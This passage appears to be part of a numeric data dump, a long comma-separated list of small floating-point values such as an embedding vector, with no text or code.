.01937685,0.01126128,0.022666708,0.008135796,-0.011263542,-0.012172632,0.008886985,-0.012858329,0.020580286,0.0073104594,-0.011576306,-0.023968685,-0.023210997,-0.002307239,-0.00097089773,-0.018128796,0.015360415,0.007974491,0.013888367,0.012739369,0.0043815626,0.006796341,0.027642988,0.00847282,-0.013969119,0.00090963114,-0.0047302605,0.0024742968,0.017287718,0.014601985,0.006285458,0.0013451343,0.018476019,0.020668954,-0.025330823,-0.022903288,-0.0028193907,-0.0031162729,-0.035650253,-0.01233914,-0.00030833206,-0.00022738731,-0.030579347,-0.0058483374,0.10902931,-0.000073178344,0.0043888227,-0.01687468,-0.0016322072,0.0016459689,-0.032056518,-0.018212393,-0.011615498,-0.012920503,-0.028717978,0.012460737,0.006242957,0.004021961,-0.0074359733,-0.025269443,0.0012926927,-0.009498057,-0.06390266,0.0055969735,0.022155534,0.0037200486,-0.012527108,-0.0044453214,0.009038097,0.0029616714,-0.030545067,0.0019806197,-0.024384722,-0.0006758665,0.0042173285,0.023053885,-0.024813846,-0.003426845,0.006495053,-0.023790305,-0.017502664,0.0029007643,-0.027259147,0.0006247642,0.0052515636,0.004949171,0.003572659,0.0050957208,0.00388818,0.029655794,0.038353138,-0.0073738312,0.0065311436,0.018643884,0.020369988,-0.0116274245,0.0066547296,0.02283199,-0.01713128,0.0032950903,-0.0010304074,-0.01651538,-0.018927753,-0.005938294,-0.0040426305,0.009119965,-0.00075645157,0.024463644,0.009298421,-0.00466554,0.020491239,0.039035436,0.0011451754,0.01266813,-0.03324131,-0.0075887744,-0.0190413,-0.017366147,-0.0006414238,0.0013901844,-0.008230765,0.0138039915,-0.01670087,0.009886466,0.0020170563,0.0029358552,-0.020133035,-0.0035268767,0.005116431,-0.0069058184,-0.017853763,-0.014884616,0.009466884,-0.011306396,0.02309095,0.037003875,-0.0021733055,-0.005092592,-0.020107735,0.012875815,0.007182149,-0.011145393,-0.008988834,-0.016298125,0.0067443694,0.012315467,-0.020601798,0.018294461,-0.004936184,0.021404494,0.0070944675,0.0062647043,-0.020717815,0.0058309888,0.0386128,-0.021336319,0.01716666,-0.027233025,-0.016147116,-0.006205987,0.0005865723,0.00042707144,-0.008091628,-0.004926966,-0.006155377,-0.01690197,0.006625319,0.020242803,-0.039510414,-0.005774578,-0.024753071,-0.012201963,-0.0038736684,-0.014065107,-0.004800525,0.004389672,0.008799715,0.00045955257,0.010710962,0.009933061,0.012974797,-0.021451805,0.040303536,-0.020090465,0.029640427,0.011725899,0.0049638976,-0.027043184,-0.0035813197,-0.0100426935,0.012435911,-0.0012392424,-0.0135381,-0.008627634,0.009295265,0.02731901,0.009974457,0.0095794285,-0.0054354984,0.0026434637,-0.016470946,-0.0052132513,0.009991846,-0.020444062,-0.022156104,0.015993929,-0.016872166,0.004397764,-0.005957856,-0.015930494,0.0070022815,0.06827005,0.0043023643,-0.012506423,-0.0014050492,-0.025346309,0.0021002323,0.035342094,0.0033028524,0.01205747,0.0045760493,-0.010458065,-0.030807484,0.001191602,0.001649695,-0.015601299,0.025938848,-0.021488959,-0.010412314,-0.018982997,-0.014637557,0.03297476,-0.03244861,-0.013839772,0.01888927,0.015612059,0.010944394,0.0021362717,-0.01311226,0.0022198947,-0.02069175,-0.009319093,-0.013784757,-0.0022552942,0.004054786,-0.045910057,0.011750664,0.020680703,0.00779622,-0.009983732,-0.016858373,0.007888067,0.009146035,0.0020667918,-0.011443118,-0.018275984,0.029760692,-0.0008884673,-0.008643713,-0.02346924,0.008762726,-0.003695293,0.03631311,-0.025740417,0.025971642,-0.002960127,0.013429228,0.024302559,-0.027598724,0.024093674,0.027807115,0.016300693,0.014052345,0.0021288237,-0.008055018,-0.0030696217,0.044220142,-0.018078303,-0.00877883,-0.0031762593,-0.010540118,-0.009711444,0.006236693,-0.005136888,0.005683821,-0.0037988264,0.023638004,-0.0009827423,-0.0019618156,0.004322042,-0.0017607944,-0.012769433,0.02209509,0.014881066,-0.00044282904,-0.012674393,0.0018216188,0.003964939,0.00817833,0.005609644,-0.0003213472,-0.009999784,0.013975923,0.005407861,0.028544711,0.029119788,0.015266405,0.026831182,0.016923878,-0.023203442,0.01179748,0.005391381,-0.0027009891,-0.002461291,-0.0036931706,-0.014506619,0.002035355,0.0074534905,-0.00601292,0.0072944392,0.016556345,-0.006914097,0.002812614,0.013943759,-0.008525429,0.019660003,-0.020799888,-0.011340118,-0.0191206,-0.0032904611,-0.0015503095,0.02202534,0.006656959,0.0070945667,0.018890461,-0.0043696268,0.014296483,-0.0143753905,-0.011472558,-0.005205741,0.023188625,0.008488352,0.03540271,0.02941217,-0.035883076,0.025481725,-0.006378213,-0.016418977,-0.02797574,0.028690597,0.008530359,0.021813411,0.020886539,0.030535003,-0.0154548045,0.012336118,0.011461189,0.030138807,0.004163203,-0.020795166,-0.013765456,-0.0054720934,0.0020829488,0.0056441324,-0.012456311,0.007587912,0.002722176,0.027051996,-0.026498912,0.012900185,0.016186172,0.011569947,-0.022528484,0.012058386,0.011352726,-0.008104067,0.01435022,0.021606999,0.03856216,-0.018442899,-0.018713253,0.002495881,0.0013927881,0.0113278115,-0.014589353,0.025730975,-0.0297679,-0.005101286,-0.0047047692,0.022897583,0.011645492,0.02304272,-0.022685647,-0.009863973,0.00081682927,-0.0010821945,-0.021079667,-0.0006718632,0.017550953,-0.013849703,-0.02071615,-0.019116605,-0.012404218,0.015107867,0.010488672,0.0041883853,-0.028346723,-0.012924599,-0.01708919,0.0014218611,0.013460789,-0.009244477,0.008311283,0.015440225,0.0032932877,0.00580165,-0.017289856,0.0361599,-0.011622827,0.004804611,0.0030092592,0.0152058555,0.014718421,0.0033257692,0.005461551,0.016069697,0.013491392,0.0085745,-0.007815536,0.019953573,0.027290339,0.020338401,-0.013265056,0.0054559526,0.013342283,0.008767642,-0.001366434,0.019515708,-0.018845173,0.0062226276,-0.022313682,-0.014778558,0.0018892912,0.0031148416,-0.008054864,0.016623879,-0.008005642,-0.016574677,-0.010547155,0.0012480594,-0.0017913519,-0.014901041,0.03715007,0.011823815,-0.018730203,0.012861882,0.00871524,-0.0010604376,0.0035320902,0.018718697,0.0050145523,-0.009022257,0.018342908,-0.0053483984,-0.011406316,-0.0069538173,-0.002532296,-0.0124056,0.015585645,-0.015708178,0.011584964,0.011996664,0.008776409,0.014790458,-0.02798521,-0.032825463,-0.0038220738,0.00085274107,-0.028321194,0.004595299,-0.011725737,0.019697797,-0.018998,-0.010425593,0.019282326,0.0006393584,-0.003228236,-0.01957662,0.021945497,-0.03142034,-0.012765065,0.009395553,0.01045264,0.00866349,0.044768356,0.0121684475,0.009062629,-0.009043368,-0.011479241,-0.010697486,-0.00895636,-0.008091375,0.0028901116,0.0036523016,-0.000457892,-0.04801151,-0.022694856,-0.024461666,-0.02898614,-0.030317428,0.04173384,0.013917088,0.011668018,0.00089435163,0.014029513,-0.012057314,0.00014809046,-0.006282198,-0.031374693,-0.011080874,0.017514033,-0.011611606,0.0153325945,0.0011036115,-0.011043253,-0.009902205,-0.025728598,-0.019463176,0.0052840086,0.0021563268,-0.0110671045,-0.003925247,0.02105849,-0.033300363,0.026199613,-0.01412561,0.013426153,-0.0011181998,0.04194559,0.03143512,0.016908038,-0.022597987,0.018113462,0.003603455,0.018255156,0.00600961,0.0187473,0.013063514,0.0067794877,-0.004661189,0.0063521364,-0.009108188,-0.01607534,0.0046598255,0.02895496,0.034214735,0.0012401983,0.023071753,-0.005323012,0.025999181,0.011687446,0.035471432,-0.00067276944,0.016816314,0.011845552,0.0026734725,0.023721889,-0.012902586,0.015748205,-0.029938627,-0.019546058,-0.001463887,0.03937675,0.010112562,0.0046532257,0.013921764,0.00043361768,0.0068087773,0.012923003,-0.00056602486,-0.0032371925,-0.010924464,-0.014876008,-0.009626031,-0.019410996,-0.00710728,-0.033318292,0.000540201,0.027218152,-0.0059625744,0.002879762,-0.009839432,-0.02422622,0.028882755,-0.008174022,-0.045739587,-0.03291612,0.00060977426,0.02171661,-0.02278762,-0.013014175,0.008205057,0.00037011912,-0.0021904754,0.01808752,-0.018184217,-0.013656624,-0.015590679,-0.024042744,0.027416423,0.005089789,0.021746716,-0.0018006354,-0.024646234,-0.009127703,-0.01621444,0.003774338,0.0047645285,-0.0024313664,0.017426752,-0.004025703,0.0016954484,0.0057873563,-0.017723884,-0.0027388723,0.014397003,-0.043568622,-0.004861985,-0.006054841,0.0035477371,-0.016296875,0.015811633,-0.013717967,0.03814722,0.030422568,-0.008290536,0.0063392823,-0.023541331,-0.0033068496,0.025192305,0.021887241,-0.00832968,-0.020365186,-0.007378723,-0.006735498,-0.012968709,-0.004230986,0.0012892148,-0.019957919,-0.020311663,-0.022629067,0.010641685,-0.041391876,-0.0024805337,0.0045162365,-0.019963626,0.036937032,-0.015368207,0.011111461,0.0089457305,-0.0028877635,-0.00040213275,-0.014321451,0.006632808,-0.032315876,-0.016770719,0.03183105,-0.013129965,0.017422285,0.016383363,-0.028835036,-0.022920538,-0.013459797,-0.0009834578,-0.012227469,0.019221311,-0.0059702382,-0.0227992,-0.022197006,0.013862911,-0.016720913,0.01117233,-0.01806987,-0.008837587,0.0048792358,-0.025310716,-0.0019443425,0.02203057,-0.013845326,0.010092233,0.02124137,-0.0124694705,0.008761123,0.013679486,0.022263344,0.0010079667,0.008104445,-0.0006728664,-0.013904889,0.009132356,-0.004561734,-0.002298578,0.028374236,0.0027954637,0.0098151965,0.005112853,-0.019111944,-0.019693455,-0.001787991,0.019311432,-0.006037201,0.013998868,0.0137173,0.0015969435,0.0053367843,0.0028802296,0.025010752,0.00059911754,0.00881892,0.015763441,0.0015161578,-0.04198153,-0.013777989,0.012710269,-0.010814406,0.0035632064,0.02012233,-0.010919349,0.021115413,0.025571534,-0.009741975,-0.008788756,0.019650662,0.0011706363,-0.01574441,0.025274998,0.0045293462,-0.0043601915,0.008114792,0.024812572,-0.039563585,-0.013135405,0.012058766,-0.0074182763,0.036102492,-0.016068235,0.008143477,-0.0077143447,0.0081735365,0.0070268884,-0.014405702,-0.0054805228,-0.01785588,0.019391337,-0.010435475,-0.0006482165,0.0144630475,-0.0078141475,0.016171757,0.015819205,-0.0000534909,0.007282697,0.013273626,-0.017290955,0.004317384,0.008915224,-0.0015468373,-0.005494302,0.005750594,-0.0036242933,0.003305508,0.029101498,-0.012734246,0.00033274802,-0.024396665,-0.008680658,0.015868226,0.010626479,-0.03896104,-0.01929244,0.024280211,0.018014112,-0.013914753,-0.0071368646,-0.019900588,-0.08324379,0.022750922,-0.008355951,-0.0064062406,0.007556998,0.013169927,-0.0064366655,0.007755424,0.0436326,-0.018668255,0.0018213767,0.002095672,0.013862522,-0.0034527632,0.010099031,-0.01998768,-0.01448621,-0.012063278,0.013890113,0.0010352904,0.00043561164,0.005355783,0.014707402,-0.0032915976,0.049220964,-0.004918468,-0.0018035104,-0.007873086,-0.021060692,0.010201879,0.0022299925,0.012573683,-0.014430802,-0.0016211325,-0.009762208,0.0061508217,0.007651089,-0.011014159,-0.010825463,-0.00049974374,-0.006267367,-0.0035602383,0.014373596,0.03219532,-0.015129885,-0.018261692,0.021683827,-0.006676968,-0.0032434934,-0.007874962,0.031969197,-0.00763556,0.0023506724,-0.0028790045,-0.022927886,0.02418158,-0.007449928,-0.005953564,0.03361055,0.010212457,0.00068213843,-0.0059548845,0.020159943,0.012964152,-0.027813949,-0.0069384817,-0.00040125303,0.025905497,-0.007052715,-0.022624975,-0.013443474,-0.00042692586,-0.014234142,-0.0015853186,-0.02874466,0.021386603,-0.007873691,-0.0016607272,0.00032595286,-0.0115110995,-0.016595941,0.023818746,-0.024209991,-0.0018008549,-0.008827432,-0.009959311,0.005333409,-0.0021026742,-0.000047068002,-0.011901507,0.003074502,0.008823093,-0.0032627932,0.029214205,-0.0038314227,0.030393373,0.0022631935,-0.011760306,0.013494351,0.006596713,0.02873252,-0.00411136,-0.0105594,0.054948993,0.007411001,0.0009614937,0.003948587,0.0024896474,0.017554045,0.013186172,-0.0067788884,0.010621767,-0.0055080554,0.022787279,0.009807641,-0.0024935734,-0.007760007,0.029836785,0.03749959,0.029655615,0.008928167,-0.011701161,0.012368051,0.0021627003,0.0055355313,-0.004908368,0.005848704,0.0103189945,-0.003430067,-0.007232547,0.0027559064,0.011646822,0.0016497147,-0.009665666,0.012574675,0.007886723,0.004250457,-0.028012285,-0.005775699,0.0011339058,-0.0051907054,0.0025162231,-0.010069393,0.00193284,0.017028866,-0.02708211,-0.008264765,0.004797574,0.013563855,-0.004626995,0.0013115377,0.007304957,-0.0072806943,0.00870958,0.0023238442,0.007514904,-0.008454627,-0.011759456,-0.0045602117,-0.00012356185,-0.006284883,-0.019086214,-0.0038461324,-0.0046773143,-0.040135033,0.016083233,0.001602571,-0.011566606,-0.015472386,-0.0063260267,0.014328188,0.00036087175,-0.013355125,0.029565059,-0.016035479,-0.029832456,0.028634144,-0.0019328534,-0.0030104057,0.010813273,0.02121352,0.039525446,-0.00462849,-0.005805018,0.010300231,-0.0040360447,-0.0040276023,0.0003870202,-0.011846183,-0.010142994,-0.0020950506,0.0010277423,0.020141678,-0.000736599,-0.015999623,0.0354686,-0.0009789241,0.01972014,0.014714967,-0.020818297,-0.01075684,0.019119939,-0.00062436954,0.01254219,-0.025260758,0.027537625,0.020377662,-0.05057621,-0.009922909,-0.011446366,-0.015782407,-0.009880705,-0.004019834,0.0050295265,-0.024816813,0.0030560791,-0.022027088,0.0017073371,0.012553924,-0.016959047,0.00010669816,0.019684963,0.024572713,0.00226889,-0.019812869,-0.004259895,0.005212991,0.010349939,-0.011712957,-0.0064984034,0.023406405,-0.0041904896,0.007945797,0.018231489,-0.02698002,-0.01204311,0.0066090785,0.005255515,-0.01269344,0.005552065,0.01175271,0.008893846,0.0067955325,-0.016341038,-0.01736779,0.030684628,0.0016710192,-0.0045789476,0.017060725,0.026039248,0.003931272,0.0035253104,0.01581234,0.007914425,-0.014212383,0.0036103053,-0.036022257,-0.004392986,-0.0028506923,0.0030065854,-0.010876873,-0.015970415,-0.0057501076,-0.011323726,-0.0020211537,0.004487725,-0.0005351456,0.011122525,0.010824366,-0.010318629,-0.004041013,0.002313029,-0.001392036,-0.0033043332,0.012679517,0.012449308,-0.015977038,0.002646307,-0.006132815,0.019261329,0.0077798036,0.020551758,-0.0008481796,-0.029994177,0.016688446,0.019540777,0.015058134,0.008701797,0.023810081,-0.008230462,-0.023516772,-0.026079567,-0.005711916,-0.0010506347,0.012164285,-0.0006634837,-0.008944865,0.007960189,-0.011239008,0.00005433724,0.08916283,-0.016778225,0.008344864,-0.0041688723,0.021332929,-0.02304909,0.01672907,0.006027265,-0.007453203,0.0026465054,-0.026282877,-0.03291362,-0.017121457,-0.008869616,0.01656814,0.009939729,-0.000562809,0.0062284237,0.0014276584,0.009167222,0.0022605434,0.013200621,0.008708289,0.011811659,0.012050033,0.031442136,0.014014158,-0.014843886,0.017413603,0.012045113,0.005246458,0.00213855,0.015785847,0.021926008,-0.010865668,0.001993707,-0.00035312702,-0.006027998,-0.00589039,0.005920016,-0.0071167275,-0.009189071,0.04516301,0.0012481939,0.0016346462,-0.016001623,-0.0055317595,-0.0019957328,-0.025430875,-0.0092718275,0.012634575,-0.001156686,-0.009154903,0.006296499,-0.016918894,-0.0021345264,-0.013169979,0.018520797,0.02472185,0.0048233294,0.0013117054,0.015253398,-0.008087002,-0.023164632,-0.014500605,0.016245821,0.009474898,-0.0053324597,0.024034979,-0.019793052,0.007929698,0.012095165,0.013076932,0.02198598,-0.015391436,0.029629486,0.019393004,-0.012682102,-0.020433363,-0.017489249,-0.011130784,0.00005676625,0.010556605,0.028433552,-0.0039716708,0.0041321567,-0.0034181245,0.0016678162,0.042528078,0.011454848,0.016133862,-0.010070326,-0.0015664865,0.008112656,0.022031054,0.02735957,0.009177165,0.010615685,-0.021917649,0.021313353,0.0006535991,0.010534998,0.022179201,-0.021373024,-0.0065183947,0.0067295954,0.002393969,-0.0106479125,0.024846518,0.038071513,0.0009573326,-0.00838124,-0.003580084,0.016369969,-0.0038705699,-0.014806589,-0.012860344,0.003414863,-0.021178862,0.0044743475,-0.0005623173,0.003079853,-0.013002829,-0.05509661,-0.0051111747,0.14391974,-0.009709075,0.0045732344,0.017209744,0.0021993713,0.0013165667,-0.11771605,0.0058401744,0.0022364818,0.01695656,0.0015655214,-0.018041715,-0.016496265,0.011478178,0.01282574,-0.00045152137,-0.008439546,-0.01885675,0.032449912,-0.013798636,-0.0033542053,0.005342085,0.004941749,0.0022520628,-0.031329386,-0.006439543,0.02204679,-0.007743143,-0.0010632956,-0.027689807,-0.009167338,0.008460978,0.011436684,-0.020753777,-0.016777668,0.00416948,0.013215145,-0.004126206,-0.036253132,-0.021338336,0.044118986,0.0036668556,-0.0071198684,-0.027331527,-0.16533463,0.005576503,0.02024318,-0.040616326,0.023007935,-0.013573151,0.0076629114,0.0027488961,0.009700679,-0.0134659875,0.00037450617,0.034532454,-0.01048557,-0.00019160759,-0.005021341,-0.012153923,0.004147453,-0.003297904,0.014119378,-0.011290168,-0.0074941055,0.0022743312,-0.023949306,-0.0013147047,0.005817011,0.019902347,-0.007830337,0.020104483,0.0028416875,0.0016154859,-0.018286938,0.011696758,-0.031165035,0.01605771,-0.016044457,-0.009369382,-0.0021936996,0.01730887,-0.0028812517,0.032185372,0.0007760611,-0.0036566309,-0.017920917,-0.009098709,0.008534315,0.017384768,0.0005919239,0.017269466,0.018087255,-0.0029852034,0.008990849,-0.00083512097,-0.03274163,0.027642932,-0.0014578515,-0.00945036,-0.0040933667,-0.02238323,-0.0064333375,-0.009212489,-0.003481352,0.006987275,-0.024146711,0.000071056194,0.032905776,-0.005132957,-0.012268245,-0.014048502,-0.010702595,0.0022325497,-0.007894205,-0.0030428022,0.006646659,-0.016427794,0.010443159,0.007986316,-0.0061436095,-0.007731277,0.0103591485,-0.015760299,0.043659978,-0.015214324,0.009036651,-0.044556808,0.00025974098,-0.015894765,-0.013910801,0.010164283,-0.0065385145,0.0035564692,0.017187247,-0.0077563412,0.0130230915,-0.011315145,0.026365623,0.0020701329,0.04291186,-0.014119576,-0.02513583,-0.00022282348,0.009701222,-0.014377927,-0.011597011,0.011342921,-0.009504487,-0.004667326,-0.004672824,-0.0061045648,-0.031843655,0.015814576,0.003028652,-0.011959247,0.025836695,-0.0018067226,-0.012419478,0.0051137847,0.009042945,-0.010850776,0.011013142,-0.015709365,-0.03216793,0.0099437665,-0.016289325,0.0077027176,0.027162608,-0.005190548,-0.02028844,0.00028517074,-0.028047716,0.011126385,-0.022334784,0.018293919,0.0003453509,0.006358402,-0.018101115,-0.008536792,-0.014841497,0.032112833,-0.020759813,0.001257263,-0.0010709297,0.004298363,-0.01764009,-0.0014758847,0.005565923,-0.009819456,0.021087745,-0.004387719,0.024078256,0.0025683732,0.014888121,0.026988843,-0.022975825,-0.009669206,0.0026952508,0.0723824,-0.006207884,-0.014334103,0.015040914,0.01081529,0.020197384,0.01415284,-0.012815727,-0.011183494,-0.016268222,-0.013865788,0.0023959128,-0.006333197,0.0154702375,-0.031721488,0.031923845,0.006021331,0.013440178,-0.0067300117,-0.0032120964,0.013512605,-0.016286757,-0.016260112,0.025661772,0.02277405,0.0005807335,0.015955353,0.004888954,-0.012076411,-0.0021451814,-0.014609513,-0.012973289,0.0019583686,-0.0027954043,0.0048941243,-0.03886929,-0.017509747,-0.01677966,0.007403788,-0.020249384,0.0026355402,0.011685677,0.008040269,-0.019649228,0.008246952,-0.00806171,-0.011845832,0.009723253,0.0053376877,-0.0016341017,0.0018014915,0.005499939,-0.001326689,-0.0029610195,0.011202279,0.000656747,-0.0260257,-0.008390345,-0.0015628564,-0.005953301,0.023175223,-0.002618833,-0.0030915884,-0.008024072,0.0015111539,-0.008955607,0.001303371,0.006589901,0.0031285882,0.029643735,-0.00011017933,0.0087566525,-0.01610456,0.0073834276,0.022616595,-0.014628834,-0.01791528,-0.007129113,-0.016484227,0.027032034,0.009339173,0.020973377,-0.011155312,0.0007087226,-0.0060074483,-0.0225054,-0.022208018,0.049407676,-0.018987907,0.00032307478,0.011252418,0.015096962,0.046738684,-0.0014347353,0.010622817,0.01582,0.020463206,0.0074119894,0.0101491315,-0.0017399066,-0.0038594767,0.01616671,0.004483172,-0.02482277,-0.00921266,-0.0006543542,0.0043394696,0.019617321,0.010474567,-0.0063406224,0.015919087,-0.022945454,0.0014839618,-0.030070562,-0.00474793,0.04417491,-0.0055700275,0.0065545044,0.03012788,0.0033766157,-0.019860933,-0.009122147,0.00953382,-0.015121597,0.016598739,-0.017851394,0.011484822,0.0142420335,-0.038340412,0.017545063,0.007019143,0.018921822,0.01702586,-0.009544902,0.0011917696,-0.008674191,0.025035782,0.009942637,0.0006060151,0.014676852,-0.032632552,-0.0066454103,-0.010355298,0.003942565,-0.026003215,0.011086919,0.0043545235,-0.023700621,-0.021041444,0.012381395,-0.02989593,0.007111607,-0.015945693,-0.0034319959,0.011170635,0.013346378,-0.011275262,0.00093258906,-0.02438585,-0.0041677603,0.0013300785,0.040989526,-0.007600962,-0.0034507643,-0.02947521,0.020333564,0.029206654,-0.0035151613,0.016476277,0.0036577797,0.015628245,-0.012950631,-0.00193633,-0.012239352,-0.0017127811,-0.015010733,0.0062254877,0.009799225,-0.018272994,-0.03484828,0.0049128016,0.015593773,0.003005082,0.000014151287,0.017322952,0.0051890947,-0.0019556584,0.033338305,-0.01666092,-0.0056398623,0.0048995856,-0.007144251,-0.0242392,0.000931982,-0.038851444,0.00284221,0.017640293,-0.013710777,-0.0021493665,0.015259143,0.008881224,0.024272796,-0.015584319,-0.011943231,-0.0028538522,0.011667991,-0.0010951149,-0.02697111,-0.0030303746,-0.010776866,-0.017300317,-0.01959439,-0.03696179,0.025005627,-0.00280733,-0.0016572429,-0.007945951,0.029807497,-0.00019526716,-0.030649748,-0.0038895726,-0.0054083276,-0.00064805325,-0.0035107716,-0.0006817745,0.0057946634,-0.0038682222,0.03809909,-0.023898115,0.0054258504,-0.0030337237,0.04261039,0.009300774,-0.015115712,-0.0031983624,-0.012827541,-0.020274013,-0.015133084,-0.027340522,0.00360998,-0.0019027416,-0.021359557,-0.008951518,0.007256376,-0.0061665517,0.0071192393,-0.0015027723,0.015205093,0.010833817,0.025056558,0.004384811,-0.019054938,-0.038854197,0.0000123271075,0.0047714487,-0.015142091,0.00029135164,-0.0027219574,-0.00040365165,-0.032816958,-0.016030189,-0.025012873,-0.0039043287,-0.001252467,-0.0115596475,0.010902927,-0.0023437375,0.04154556,0.018290952,0.010718085,0.018611658,0.011166075,-0.0017972996,0.0030819888,0.019161105,-0.01831705,0.009205,-0.0039011692,-0.013033204,0.020409519,0.001283266,-0.024198769,0.027834794,0.010083517,-0.010268248,-0.0047671758,0.016416604,0.026910568,0.007879411,-0.03067222,-0.023944138,0.021577245,0.015830114,-0.014536838,-0.030917823,0.015208988,-0.003474767,-0.011988332,0.010422475,0.00057454227,0.014231872,-0.0046267863,-0.0031934495,0.031655874,0.009341171,-0.029411118,0.03456446,0.0135913165,-0.013913837,-0.00032868568,-0.019875707,0.011821392,0.01996154,0.0009409392,0.0056473925,0.012007302,0.011317406,0.047256257,-0.014179517,0.0053418996,-0.007282534,-0.008825002,-0.0139609985,-0.015874056,-0.037597705,0.008937113,-0.028578164,-0.00022471757,-0.017920265,-0.011682393,-0.0024545516,-0.017851872,0.0031472081,-0.19345644,-0.003658165,-0.008799347,-0.018215587,-0.014560397,-0.0038829453,0.020451237,0.0075221295,0.0012257172,0.00042745823,-0.0024436223,0.047034543,-0.00532212,0.010848362,-0.013440432,-0.007240398,-0.03223369,-0.002725153,-0.011920651,0.0073083523,0.025487991,-0.0076788897,-0.0058297953,-0.0009683643,0.011509461,-0.003278923,-0.0030613279,0.014805434,0.005871815,-0.00477179,-0.01104857,0.012923518,0.0069695404,0.0060915314,0.0067163035,0.02515426,-0.008056542,0.009434858,-0.0045469934,0.015389595,-0.0016924372,-0.0017210436,0.008078712,-0.007078047,0.0049145506,0.011864528,0.007176016,0.02843197,0.0148324,0.024242742,-0.023548314,-0.007381922,0.0026273304,-0.0036119525,-0.028250104,-0.009551837,-0.008187887,0.010380644,0.02750735,-0.0021776545,-0.007745964,-0.001806192,0.012947368,-0.0052613663,0.003722548,0.0009306637,-0.0015138666,0.011610161,-0.024257207,-0.0020707676,0.0058138305,0.019874943,-0.005773302,0.0017188078,-0.0017594758,0.019630529,0.0068725757,0.0017891602,-0.011848493,0.018896509,-0.038263604,-0.004563945,0.008617998,0.028613083,-0.0073352633,-0.010598027,0.012303453,0.0047153956,-0.010468626,0.015122983,0.010050227,0.0033358922,-0.0063047186,-0.017646749,-0.0010160361,-0.00020799736,-0.011484723,0.011429838,-0.0034162037,0.005674058,-0.0038579218,0.0039106645,-0.008173092,-0.014363207,-0.12871067,-0.0023041405,0.011376215,0.005706583,-0.010271668,-0.02574153,0.016503599,-0.0027907256,0.03156826,-0.005533587,-0.022703698,0.0063882056,0.0032980056,0.010669655,-0.001119299,-0.011702049,-0.023485737,0.0045036143,-0.0022901748,-0.006963157,0.010268977,-0.034158383,0.0064437822,0.024745855,0.0051742336,0.024942266,0.012878896,0.0395091,0.02694007,0.003010398,-0.012539876,0.006304229,-0.0015524582,0.003379947,-0.072944276,-0.008038293,0.013242021,-0.014387573,-0.010767979,0.029524572,0.006001243,-0.007071332,0.016217062,0.016001148,0.00087880995,-0.029408284,0.0008982069,0.021582872,0.0057886867,-0.027408825,0.0062831934,0.014728841,-0.012182227,-0.025012575,-0.005150408,-0.02522514,0.014524136,0.0069810464,0.019529637,0.011075477,-0.008584924,0.01827107,-0.009591478,0.0091165835,0.008995376,0.018642273,-0.021729317,0.009499042,-0.018784137,0.005592359,0.0097649945,0.034833707,0.002655561,-0.016630698,0.028133146,-0.0059799445,0.015180099,0.030250369,0.0232013,0.010331988,0.021061832,-0.0160647,0.0111647565,0.011930285,-0.027217744,0.02314031,0.0027143178,0.0033225622,-0.01711852,-0.00736997,0.029298907,0.003149074,0.004031478,0.018916737,0.0066467174,0.0021883806,0.03367881,-0.0010096768,-0.0077625876,-0.0065773395,-0.011154166,-0.012335801,-0.013134879,0.0063369987,-0.02283023,0.011088907,0.012614597,-0.014153423,-0.013176564,0.0044428934,-0.020380639,0.03972511,-0.021009946,0.012009077,0.010647252,-0.0047689457,-0.022475047,-0.006123683,-0.009200659,0.00025094143,0.0191466,-0.003045482,-0.010097182,-0.026027236,-0.012488493,-0.0290246,-0.013372055,0.033661377,0.014607354,-0.023658795,0.009483836,0.006429162,0.017532973,-0.01735104,0.014051124,0.010533433,-0.009119894,0.0019238825,0.008095087,0.004114768,0.031202514,-0.010164068,0.016695462,0.0041663814,-0.01526079,0.005546257,-0.00861263,-0.008371713,-0.019624123,0.0060663465,0.0066179954,-0.01344733,0.012424966,0.028110096,0.016387308,0.003683703,-0.020554937,-0.008139952,0.0035442298,0.0013146909,-0.013377543,0.010941485,0.026701106,-0.009598686,-0.013457766,-0.003671352,0.0021961967,-0.0066097137,0.0049368753,0.015223632,-0.003166585,-0.00055088673,0.0106484825,-0.057330392,0.006950016,0.016742468,0.021885473,0.027411696,0.025592875,0.029793652,-0.007092977,0.0010114934,-0.00331671,0.007264139,0.012045805,0.011353998,-0.02457377,-0.018047553,0.005988169,0.00020716515,0.02829498,-0.00530929,-0.007964362,-0.013446999,0.0019015882,0.0043809735,-0.001975802,0.011255496,0.010101627,-0.001967922,-0.015222326,0.0025602586,0.01292154,-0.0011964483,0.011101885,-0.010138452,0.004843854,0.011805183,0.0067035067,-0.00937315,-0.023948431,0.013946254,-0.016018655,-0.0059769494,0.015387319,0.0071014464,-0.0060542114,-0.027233606,0.01208948,0.02677758,-0.0053082807,-0.03646241,0.006128273,-0.0059618494,-0.008386442,0.026469499,0.022850977,0.0094186375,-0.018383058,-0.0028685047,0.012486668,-0.0037864456,-0.03489177,-0.0061517353,0.008770974,0.006666935,0.02673844,0.0005724794,0.002316121,0.0000044566805,0.03914565,0.020611202,0.031827938,0.020826979,-0.00054742827,-0.008016303,0.0011800968,-0.0033198444,0.003060099,0.029977078,0.0019851327,-0.00028405967,-0.0045268615,-0.00009649611,-0.00051538,0.013456763,0.02012057,-0.0030155662,0.0034092604,0.00422418,-0.012610921,0.0012378852,0.000095403004,-0.027209122,-0.006624032,-0.0037894957,-0.00823563,-0.026261682,0.00005020651,0.006347187,0.015598478,0.0073482157,-0.015151171,0.020736195,-0.011360535,-0.008698275,0.0001619937,0.006707163,0.012738161,0.008105693,-0.012089742,-0.0048266146,-0.019741101,0.027489226,0.013418702,0.021765374,-0.0050504357,0.010800253,-0.020939138,0.00040288275,0.011132414,-0.007060102,0.00063380256,0.0014403138,-0.004593607,-0.0039754733,0.0060729953,0.002000917,0.0109311985,0.018552294,0.019077042,-0.020720057,0.0040407428,-0.010528769,-0.0010090633,0.013904083,-0.00799225,0.012779141,0.013134631,-0.022241311,-0.011316901,0.017621376,-0.014477371,0.016461281,0.01861105,-0.0015373055,0.0028989583,0.0049094954,-0.03396819,-0.01876095,0.0028637936,0.0044708373,0.024606317,-0.03025202,0.019463051,0.004710107,-0.0024992374,0.029878728,-0.0146952,-0.010297443,0.008153312,-0.04681528,-0.008252981,-0.0011548643,0.018557385,0.0021506513,0.0045746216,0.02692208,-0.00859039,0.011298744,0.0015237486,0.0009403745,-0.00048341608,-0.012481223,-0.002033255,0.009651078,-0.00589331,-0.0031597505,-0.0035019894,0.013243471,0.0015818209,0.004889227,-0.0022961698,-0.0014817384,-0.026374703,0.0057494533,-0.022408905,-0.009688924,0.0143130245,-0.0064112353,-0.0025775696,0.017793464,-0.0065351287,-0.028211333,0.004565752,-0.016008763,-0.010530408,0.004729283,-0.0041740974,-0.000265143,-0.006872789,0.0205672